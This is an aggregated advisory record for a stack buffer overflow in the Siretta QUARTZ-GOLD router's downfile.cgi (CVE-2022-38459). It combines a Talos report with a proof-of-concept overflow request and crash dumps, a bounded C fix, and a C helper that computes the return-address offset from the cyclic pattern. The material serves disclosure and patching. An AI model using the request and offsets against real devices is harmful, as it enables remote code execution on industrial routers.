A stack-based buffer overflow vulnerability exists in the httpd downfile.cgi functionality of Siretta QUARTZ-GOLD G5.0.1.5-210720-141020. A specially-crafted HTTP request can lead to remote code execution. An attacker can send an HTTP request to trigger this vulnerability.
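The root cause, as the Talos report below shows in the decompiled `downfile.cgi`, is an unbounded `sprintf` of the attacker-controlled `_filename` parameter into a fixed-size stack buffer. The following is an added example, not Siretta's firmware code and not the vendor's patch: a bounded replacement for the two `sprintf` calls in that handler which fails closed when the formatted result would not fit, and which additionally refuses filenames that are not a single path component. The buffer size `BUFF_SIZE` (1024) is taken from the frame the report's disassembly releases with `add sp, sp, #1024`, and the base folder `/jffs` from its crash registers; the function names, the `NAME_MAX_LEN` cap and the single-component rule are my own assumptions for illustration.

```c
#include <stdio.h>
#include <string.h>

#define BUFF_SIZE 1024   /* assumed: the 1024-byte frame seen in the report's disassembly */
#define NAME_MAX_LEN 255 /* assumed cap on one path component (NAME_MAX-like) */

/* Accept only a single, non-empty path component: no separators, no "." or "..".
 * Rejecting traversal is hardening on top of the overflow fix, not part of it. */
int filename_is_safe(const char *name)
{
    size_t len;
    if (name == NULL || name[0] == '\0') return 0;
    len = strlen(name);
    if (len > NAME_MAX_LEN) return 0;
    if (strchr(name, '/') != NULL || strchr(name, '\\') != NULL) return 0;
    if (strcmp(name, ".") == 0 || strcmp(name, "..") == 0) return 0;
    return 1;
}

/* Bounded version of sprintf(buff, "%s/%s", base_folder, filename).
 * Returns the length written, or -1 (with an empty out[]) when the name is
 * unsafe or the result would not fit. snprintf() returns the length it
 * *wanted* to write, so n >= outsz means the original sprintf would have
 * run past the end of the buffer. */
int build_download_path(char *out, size_t outsz, const char *base_folder, const char *filename)
{
    int n;
    if (outsz == 0) return -1;
    out[0] = '\0';
    if (!filename_is_safe(filename)) return -1;
    n = snprintf(out, outsz, "%s/%s", base_folder, filename);
    if (n < 0 || (size_t)n >= outsz) { out[0] = '\0'; return -1; }
    return n;
}

/* Bounded version of the Content-Disposition sprintf, same contract. The
 * header value is quoted, so an embedded quote is refused as well so the
 * name cannot break out of the quoted value. */
int build_content_disposition(char *out, size_t outsz, const char *filename)
{
    int n;
    if (outsz == 0) return -1;
    out[0] = '\0';
    if (!filename_is_safe(filename) || strchr(filename, '"') != NULL) return -1;
    n = snprintf(out, outsz, "Content-Disposition:attachment;filename=\"%s\"", filename);
    if (n < 0 || (size_t)n >= outsz) { out[0] = '\0'; return -1; }
    return n;
}

/* Demonstration helper: build a constructed name of `len` 'a' bytes and try it. */
int try_name_of_length(size_t len, char *out, size_t outsz)
{
    char name[2048];
    if (len >= sizeof name) return -2;
    memset(name, 'a', len);
    name[len] = '\0';
    return build_download_path(out, outsz, "/jffs", name);
}

int main(void)
{
    char buff[BUFF_SIZE];
    printf("%d %s\n", build_download_path(buff, sizeof buff, "/jffs", "report.bin"), buff);
    printf("%d\n", try_name_of_length(1080, buff, sizeof buff));      /* as long as the PoC's name */
    printf("%d\n", build_download_path(buff, sizeof buff, "/jffs", "../etc/passwd"));
    return 0;
}
```

Both writes must be bounded: in the decompiled handler the `Content-Disposition` header is formatted into the same `buff` before the path is, so fixing only the `sprintf` the advisory marks as `[2]` would leave the first copy exploitable.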
{"cnvd": [{"lastseen": "2023-03-15T05:24:59", "description": "Siretta QUARTZ-GOLD is a high-speed dual-port Gigabit Ethernet industrial router from Siretta. The Siretta QUARTZ-GOLD contains a buffer overflow vulnerability that an attacker could exploit to achieve remote code execution by sending a specially crafted HTTP request.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-01-30T00:00:00", "type": "cnvd", "title": "Siretta QUARTZ-GOLD Buffer Overflow Vulnerability (CNVD-2023-17080)", "bulletinFamily": "cnvd", "cvss2": {}, "cvelist": ["CVE-2022-38459"], "modified": "2023-03-14T00:00:00", "id": "CNVD-2023-17080", "href": "https://www.cnvd.org.cn/flaw/show/CNVD-2023-17080", "cvss": {"score": 0.0, "vector": "NONE"}}], "talos": [{"lastseen": "2023-06-03T15:19:42", "description": "# Talos Vulnerability Report\n\n### TALOS-2022-1608\n\n## Siretta QUARTZ-GOLD httpd downfile.cgi stack-based buffer overflow vulnerability\n\n##### January 26, 2023\n\n##### CVE Number\n\nCVE-2022-38459\n\n##### SUMMARY\n\nA stack-based buffer overflow vulnerability exists in the httpd downfile.cgi functionality of Siretta QUARTZ-GOLD G5.0.1.5-210720-141020. A specially-crafted HTTP request can lead to remote code execution. 
An attacker can send an HTTP request to trigger this vulnerability.\n\n##### CONFIRMED VULNERABLE VERSIONS\n\nThe versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.\n\nSiretta QUARTZ-GOLD G5.0.1.5-210720-141020\n\n##### PRODUCT URLS\n\nQUARTZ-GOLD - <https://www.siretta.com/products/industrial-routers/4g-lte-router/gigabit-ethernet-small-footprint-lte-router-eu/>\n\n##### CVSSv3 SCORE\n\n7.2 - CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\n\n##### CWE\n\nCWE-120 - Buffer Copy without Checking Size of Input (\u2018Classic Buffer Overflow\u2019)\n\n##### DETAILS\n\nThe Siretta QUARTZ-GOLD is an industrial cellular router with several features and services, such as: SSH, UPNP, VPN, SNMP and many others.\n\nThe QUARTZ-GOLD router has a web server with several functionalities, a subset of which are related to the management of external files. The web server offers an API for uploading files, downloading them, and deleting them when no longer required.\n\nThe decompiled handler that serves a download of a previously uploaded file:\n \n \n void downfile.cgi(void)\n \n {\n [...]\n \n _filename_param = (char *)webcgi_safeget(\"_filename\"); [1]\n filename = \"\";\n if (_filename_param != (char *)0x0) {\n filename = _filename_param;\n }\n [... calculate base_folder ...]\n if (*filename != '\\0') {\n sprintf(buff,\"Content-Disposition:attachment;filename=\\\"%s\\\"\",(char)filename);\n send_header(200,buff,\"application/tomato-binary-file\",0);\n sprintf(buff,\"%s/%s\",base_folder,filename); [2]\n do_file(buff); [3]\n }\n return;\n }\n \n\nThe `downfile.cgi` handler expects one parameter, `_filename`, naming the file to be downloaded. At `[1]` the request parameter is read, and at `[2]` it is formatted into the fixed-size stack buffer `buff` with `sprintf`, which writes as many bytes as the format produces and never checks the size of the destination. Note that the preceding `sprintf` that builds the `Content-Disposition` header copies `filename` into the same `buff` without a bound as well, so a fix has to cover both writes. 
If the `_filename` parameter is longer than `buff` can hold (the epilogue shown in the proof of concept below frees a 1024-byte stack frame with `add sp, sp, #1024`), the `sprintf` at `[2]` writes past the end of the buffer, over the callee-saved registers and the return address: a stack-based buffer overflow that could lead to remote code execution.\n\n### Crash Information\n \n \n $r0 : 0x0 \n $r1 : 0x0 \n $r2 : 0x7ef38c60 \u2192 \"/jffs/aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaa[...]\"\n $r3 : 0x2000 \n $r4 : 0x61666b61 (\"akfa\"?)\n $r5 : 0x61676b61 (\"akga\"?)\n $r6 : 0x61686b61 (\"akha\"?)\n $r7 : 0x1 \n $r8 : 0x0 \n $r9 : 0x0001e658 \u2192 \"downfile.cgi\"\n $r10 : 0x0001dbac \u2192 0x0001e658 \u2192 \"downfile.cgi\"\n $r11 : 0x7ef3b784 \u2192 \"admin\"\n $r12 : 0x2ae5573c \u2192 0x2ae41ac4 \u2192 <_pthread_cleanup_pop_restore+0> push {r3, lr}\n $sp : 0x7ef39070 \u2192 \"akjaakkaaklaakmaaknaakoaakpaakqaakraaksaaktaak\"\n $lr : 0x2ae3bb30 \u2192 <free+492> pop {r0, r1, r2, r3, r4, r5, r6, pc}\n $pc : 0x61696b60 (\"`kia\"?)\n $cpsr: [negative ZERO CARRY overflow interrupt fast THUMB]\n \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u250
0 stack \u2500\u2500\u2500\u2500\n 0x7ef39070\u2502+0x0000: \"akjaakkaaklaakmaaknaakoaakpaakqaakraaksaaktaak\" \u2190 $sp\n 0x7ef39074\u2502+0x0004: \"akkaaklaakmaaknaakoaakpaakqaakraaksaaktaak\"\n 0x7ef39078\u2502+0x0008: \"aklaakmaaknaakoaakpaakqaakraaksaaktaak\"\n 0x7ef3907c\u2502+0x000c: \"akmaaknaakoaakpaakqaakraaksaaktaak\"\n 0x7ef39080\u2502+0x0010: \"aknaakoaakpaakqaakraaksaaktaak\"\n 0x7ef39084\u2502+0x0014: \"akoaakpaakqaakraaksaaktaak\"\n 0x7ef39088\u2502+0x0018: \"akpaakqaakraaksaaktaak\"\n 0x7ef3908c\u2502+0x001c: \"akqaakraaksaaktaak\"\n \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 code:arm:THUMB \u2500\u2500\u2500\u2500\n [!] Cannot disassemble from $PC\n [!] 
Cannot access memory at address 0x61696b60\n \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 threads \u2500\u2500\u2500\u2500\n [#0] Id 1, Name: \"httpd\", stopped 0x61696b60 in ?? 
(), reason: SIGSEGV\n \n\n### Exploit Proof of Concept\n\nSending a request like the following:\n \n \n POST /downfile.cgi HTTP/1.1\n Authorization: Basic <a valid basic auth>\n Content-Length: 1119\n \n _filename=aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaaefaaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewaaexaaeyaaezaafbaafcaafdaafeaaffaafgaafhaafiaafjaafkaaflaafmaafnaafoaafpaafqaafraafsaaftaafuaafvaafwaafxaafyaafzaagbaagcaagdaageaagfaaggaaghaagiaagjaagkaaglaagmaagnaagoaagpaagqaagraagsaagtaaguaagvaagwaagxaagyaagzaahbaahcaahdaaheaahfaahgaahhaahiaahjaahkaahlaahmaahnaahoaahpaahqaahraahsaahtaahuaahvaahwaahxaahyaahzaaibaaicaaidaaieaaifaaigaaihaaiiaaijaaikaailaaimaainaaioaaipaaiqaairaaisaaitaaiuaaivaaiwaaixaaiyaaizaajbaajcaajdaajeaajfaajgaajhaajiaajjaajkaajlaajmaajnaajoaajpaajqaajraajsaajtaajuaajvaajwaajxaajyaajzaakbaakcaakdaakeaakfaakgaakhaakiaakjaakkaaklaakmaaknaakoaakpaakqaakraaksaaktaak&_http_id=<the correct tid>\n \n\nThe status at the return address of the `downfile.cgi` function would be:\n \n \n $r0 : 0x0 \n $r1 : 0x0 \n $r2 : 0x7ef38c60 \u2192 \"/jffs/aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaa[...]\"\n $r3 : 0x2000 \n $r4 : 0x7ef38c60 \u2192 \"/jffs/aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaa[...]\"\n $r5 : 0x00031082 \u2192 \"aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaama[...]\"\n $r6 : 0x0002272b \u2192 \"/jffs\"\n $r7 : 0x1 \n $r8 : 0x0 \n $r9 : 0x0001e658 \u2192 \"downfile.cgi\"\n $r10 : 0x0001dbac \u2192 0x0001e658 \u2192 \"downfile.cgi\"\n $r11 : 0x7ef3b784 \u2192 \"admin\"\n $r12 : 0x2ae5573c \u2192 0x2ae41ac4 \u2192 <_pthread_cleanup_pop_restore+0> push {r3, 
lr}\n $sp : 0x7ef39060 \u2192 \"akfaakgaakhaakiaakjaakkaaklaakmaaknaakoaakpaakqaak[...]\"\n $lr : 0x2ae3bb30 \u2192 <free+492> pop {r0, r1, r2, r3, r4, r5, r6, pc}\n $pc : 0x0000f96c \u2192 pop {r4, r5, r6, pc}\n $cpsr: [negative ZERO CARRY overflow interrupt fast thumb]\n \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 stack \u2500\u2500\u2500\u2500\n 0x7ef39060\u2502+0x0000: \"akfaakgaakhaakiaakjaakkaaklaakmaaknaakoaakpaakqaak[...]\" \u2190 $sp\n 0x7ef39064\u2502+0x0004: \"akgaakhaakiaakjaakkaaklaakmaaknaakoaakpaakqaakraak[...]\"\n 0x7ef39068\u2502+0x0008: \"akhaakiaakjaakkaaklaakmaaknaakoaakpaakqaakraaksaak[...]\"\n 0x7ef3906c\u2502+0x000c: \"akiaakjaakkaaklaakmaaknaakoaakpaakqaakraaksaaktaak\"\n 0x7ef39070\u2502+0x0010: \"akjaakkaaklaakmaaknaakoaakpaakqaakraaksaaktaak\"\n 0x7ef39074\u2502+0x0014: \"akkaaklaakmaaknaakoaakpaakqaakraaksaaktaak\"\n 0x7ef39078\u2502+0x0018: \"aklaakmaaknaakoaakpaakqaakraaksaaktaak\"\n 0x7ef3907c\u2502+0x001c: 
\"akmaaknaakoaakpaakqaakraaksaaktaak\"\n \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 code:arm:ARM \u2500\u2500\u2500\u2500\n 0xf960 mov r0, sp\n 0xf964 bl 0xbbc8\n 0xf968 add sp, sp, #1024 ; 0x400\n \u2192 0xf96c pop {r4, r5, r6, pc}\n [!] 
Cannot disassemble from $PC\n \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 threads \u2500\u2500\u2500\u2500\n [#0] Id 1, Name: \"httpd\", stopped 0xf96c in ?? 
(), reason: BREAKPOINT\n \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 trace \u2500\u2500\u2500\u2500\n [#0] 0xf96c \u2192 pop {r4, r5, r6, pc}\n [#1] 0x2ae3bb30 \u2192 free()\n \n\nSo the next instruction, `pop {r4, r5, r6, pc}`, will load `r4`, `r5` and `r6` from the first three dwords on the stack and `pc` from the fourth:\n \n \n gef\u27a4 hexdump dw $sp\n 0x7ef39060\u2502+0x0000 0x61666b61 \n 0x7ef39064\u2502+0x0004 0x61676b61 \n 0x7ef39068\u2502+0x0008 0x61686b61 \n 0x7ef3906c\u2502+0x000c 0x61696b61 \n [...]\n \n\nAfter the pop the `pc` will contain the `0x61696b61` value. Because an ARM load into `pc` performs interworking, bit 0 of the popped value selects Thumb state and is cleared, so execution faults at `0x61696b60` with the THUMB flag set in `cpsr`, exactly the state captured in the crash information above.\n\n##### TIMELINE\n\n2022-10-14 - Initial Vendor Contact\n\n2022-10-20 - Vendor Disclosure\n\n2022-11-24 - Vendor Patch Release\n\n2023-01-26 - Public Release\n\n##### Credit\n\nDiscovered by Francesco Benvenuto of Cisco Talos.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": 
"HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-01-26T00:00:00", "type": "talos", "title": "Siretta QUARTZ-GOLD httpd downfile.cgi stack-based buffer overflow vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-38459"], "modified": "2023-01-26T00:00:00", "id": "TALOS-2022-1608", "href": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1608", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "talosblog": [{"lastseen": "2023-02-02T20:12:34", "description": "\n\n_Francesco Benvenuto of Cisco Talos discovered these vulnerabilities._\n\nCisco Talos recently discovered several vulnerabilities in the Siretta Quartz-Gold router. Talos also discovered vulnerabilities in FreshTomato while investigating the Siretta router.\n\nThe Siretta Quartz-Gold is an industrial cellular router with several features and services, such as: SSH, UPNP, VPN, SNMP and many others. FreshTomato is an open source firmware based on Linux. The firmware offers several features for Broadcom-based routers.\n\n### Quartz-Gold Vulnerabilities\n\nSeveral OS command injection vulnerabilities were found which could lead to arbitrary command execution, making them all high risk. 
[TALOS-2022-1607](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1607>) (CVE-2022-40969) and [TALOS-2022-1612](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1612>) (CVE-2022-40220) can be triggered with HTTP requests, while [TALOS-2022-1615](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1615>) (CVE-2022-38066), [TALOS-2022-1638](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1638>) (CVE-2022-40222) and [TALOS-2022-1640](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1640>) (CVE-2022-42490-CVE-2022-42493) can each be triggered with a network request.\n\nThree directory traversals were recorded in QUARTZ-GOLD, [TALOS-2022-1606](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1606>) (CVE-2022-40701) and [TALOS-2022-1637](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1637>) (CVE-2022-41154), which can lead to arbitrary file deletion. Advisory 1637 has a higher CVSS risk rating and can be triggered by a network request. [TALOS-2022-1609](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1609>) (CVE-2022-38088) can lead to arbitrary file read.\n\nThree stack-based buffer overflows were found: [TALOS-2022-1605](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1605>) (CVE-2022-36279) and [TALOS-2022-1608](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1608>) (CVE-2022-38459) can lead to remote code execution, triggered by an HTTP request. 
[TALOS-2022-1613](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1613>) (CVE-2022-40985-CVE-2022-41030) can lead to arbitrary command execution and is triggered by a sequence of requests.\n\nA heap-based buffer overflow vulnerability was also reported in [TALOS-2022-1639](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1639>) (CVE-2022-41991), which can be triggered by a network request.\n\nTwo other vulnerabilities were discovered, including [TALOS-2022-1610](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1610>) (CVE-2022-38715), leftover debug code that can lead to remote code execution, and [TALOS-2022-1611](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1611>) (CVE-2022-39045), a file write vulnerability that can lead to arbitrary file upload. Both can be triggered by HTTP requests.\n\n### FreshTomato Vulnerabilities\n\nIn FreshTomato, there is an OS command injection vulnerability, [TALOS-2022-1641](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1641>) (CVE-2022-42484), and a directory traversal vulnerability, [TALOS-2022-1642](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1642>) (CVE-2022-38451). An attacker can send an HTTP request to trigger these vulnerabilities.\n\nCisco Talos worked with Siretta and FreshTomato to ensure that these issues were resolved and an update is available for affected customers, all in adherence to [Cisco's vulnerability disclosure policy](<https://tools.cisco.com/security/center/resources/vendor_vulnerability_policy.html>).\n\nThe following versions are affected, and users are encouraged to update as soon as possible: Siretta QUARTZ-GOLD G5.0.1.5-210720-141020, FreshTomato 2022.5, AdvancedTomato commit 67273b0. 
Talos tested and confirmed these versions of Siretta and FreshTomato could be exploited by these vulnerabilities.\n\nThe following Snort rules will detect exploitation attempts against these vulnerabilities: 60649-60652, 60656-0664, 60667, 60692, 60721-60724, 60761-60763, 60771-60775, 60846-60847, 60914. Additional rules may be released in the future and current rules are subject to change, pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-01-26T21:26:14", "type": "talosblog", "title": "Vulnerability Spotlight: OS command injection, directory traversal and other vulnerabilities found in Siretta Quartz-Gold and FreshTomato", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2022-36279", "CVE-2022-38066", "CVE-2022-38088", "CVE-2022-38451", "CVE-2022-38459", "CVE-2022-38715", "CVE-2022-39045", "CVE-2022-40220", "CVE-2022-40222", "CVE-2022-40701", "CVE-2022-40969", "CVE-2022-40985", "CVE-2022-41030", "CVE-2022-41154", "CVE-2022-41991", "CVE-2022-42484", "CVE-2022-42490", "CVE-2022-42493"], "modified": "2023-01-26T21:26:14", "id": "TALOSBLOG:5A84CD5D3B3106E07A6CAFECDC1167F6", "href": "https://blog.talosintelligence.com/vulnerability-spotlight-os-command-injection-directory-traversal-and-other-vulnerabilities-found-in-siretta-quartz-gold-and-freshtomato/", "cvss": {"score": 0.0, "vector": "NONE"}}]}
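The proof of concept in the Talos report above sends a de Bruijn cyclic pattern (`aaaabaaacaaad...`) as `_filename`, so that the garbage in each register at the crash tells you exactly which bytes of the parameter landed there. The following is an added example, not part of the report or of any Siretta or Talos code: it regenerates that pattern with the standard FKM de Bruijn construction over the alphabet a-z with 4-byte windows (which reproduces the PoC string), looks up a 32-bit register value in it, and turns the hit into an offset inside `buff` by adding the `/jffs/` prefix that the `%s/%s` format puts in front of the filename. It also handles the crashed-`pc` case, where bit 0 was cleared by Thumb interworking. Function names are my own; the values searched for are the ones in the report's register dumps, and the `/jffs` base folder comes from its `$r6`.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define ALPHABET "abcdefghijklmnopqrstuvwxyz"
#define K 26   /* alphabet size */
#define N 4    /* window length: every 4-byte substring of the pattern is unique */

struct gen {
    char *out;
    size_t cap, len;
    int a[K * N + 1];
};

/* FKM de Bruijn construction: emits the Lyndon words whose length divides N
 * in lexicographic order ("a", "aaab", ..., "aaaz", "aabb", ...), which is
 * exactly the sequence the PoC's _filename starts with. */
static void db(struct gen *g, int t, int p)
{
    if (g->len >= g->cap) return;            /* stop once enough bytes exist */
    if (t > N) {
        if (N % p == 0)
            for (int i = 1; i <= p && g->len < g->cap; i++)
                g->out[g->len++] = ALPHABET[g->a[i]];
    } else {
        g->a[t] = g->a[t - p];
        db(g, t + 1, p);
        for (int j = g->a[t - p] + 1; j < K; j++) {
            g->a[t] = j;
            db(g, t + 1, t);
        }
    }
}

/* Write the first `len` bytes of the pattern into out (out needs len + 1 bytes). */
size_t cyclic_pattern(char *out, size_t len)
{
    struct gen g;
    memset(&g, 0, sizeof g);
    g.out = out;
    g.cap = len;
    db(&g, 1, 1);
    out[g.len] = '\0';
    return g.len;
}

/* 1 if the generated pattern starts with `expected`, else 0. */
int pattern_starts_with(const char *expected)
{
    size_t n = strlen(expected);
    char *buf = malloc(n + 1);
    if (!buf) return 0;
    cyclic_pattern(buf, n);
    int ok = strcmp(buf, expected) == 0;
    free(buf);
    return ok;
}

/* Offset of a 32-bit register value within the first `search_len` bytes of
 * the pattern, read little-endian as it sat in memory; -1 if not present. */
long cyclic_find(uint32_t value, size_t search_len)
{
    char needle[5];
    for (int i = 0; i < 4; i++)
        needle[i] = (char)((value >> (8 * i)) & 0xff);
    needle[4] = '\0';

    char *hay = malloc(search_len + 1);
    if (!hay) return -1;
    cyclic_pattern(hay, search_len);
    char *hit = strstr(hay, needle);
    long off = hit ? (long)(hit - hay) : -1;
    free(hay);
    return off;
}

/* Offset inside buff of the bytes that ended up in a register, given that
 * buff holds "<base_folder>/<_filename>". A crashed pc has bit 0 cleared by
 * interworking (0x61696b61 became 0x61696b60), so retry with the bit set. */
long offset_in_buff(uint32_t reg_value, const char *base_folder, size_t search_len)
{
    long off = cyclic_find(reg_value, search_len);
    if (off < 0) off = cyclic_find(reg_value | 1u, search_len);
    if (off < 0) return -1;
    return off + (long)strlen(base_folder) + 1;   /* +1 for the '/' in "%s/%s" */
}

int main(void)
{
    /* Register values from the report: r4 at the epilogue, pc at the crash. */
    printf("r4 0x61666b61 -> buff+%ld\n", offset_in_buff(0x61666b61, "/jffs", 4096));
    printf("pc 0x61696b60 -> buff+%ld\n", offset_in_buff(0x61696b60, "/jffs", 4096));
    return 0;
}
```

The two results line up with the disassembly in the report: `r4` is loaded from `buff+1024`, the first word after the 1024-byte frame that `add sp, sp, #1024` releases, and `pc` from `buff+1036`, three words later, after `r5` and `r6`. That is the byte position of `_filename` an attacker controls for the return address, independent of whatever `_http_id` or other request fields precede it.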